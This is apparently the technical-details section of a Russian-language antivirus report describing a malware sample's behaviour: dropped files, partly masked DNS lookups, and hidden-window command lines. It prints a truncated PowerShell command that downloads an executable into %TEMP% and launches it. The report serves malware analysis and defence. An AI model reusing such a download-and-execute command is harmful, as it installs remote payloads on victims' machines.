Техническая информация
- $eeggagftky как %temp%\ggsfsg.exe
- '<SYSTEM32>\cmd.exe' /c PowerShell "'PowerShell ""function xkneg4([String] $eeggagftky){(New-Object System.Net.WebClient).DownloadFile($eeggagftky,''%TEMP%\ggsfsg.exe'');Start-Process ''%TEMP%\ggsfsg.exe'';}try{xkn...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1504
- %TEMP%\gavrii-dvcit.bat
- %TEMP%\761284.cvr
- 'te####owlogix.net':80
- DNS ASK te####owlogix.net
- DNS ASK pd.#####treform-muster.de
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\Gavrii-dvcit.bat" " (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c PowerShell "'PowerShell ""function xkneg4([String] $eeggagftky){(New-Object System.Net.WebClient).DownloadFile($eeggagftky,''%TEMP%\ggsfsg.exe'');Start-Process ''%TEMP%\ggsfsg.exe'';}try{xkn... (со скрытым окном)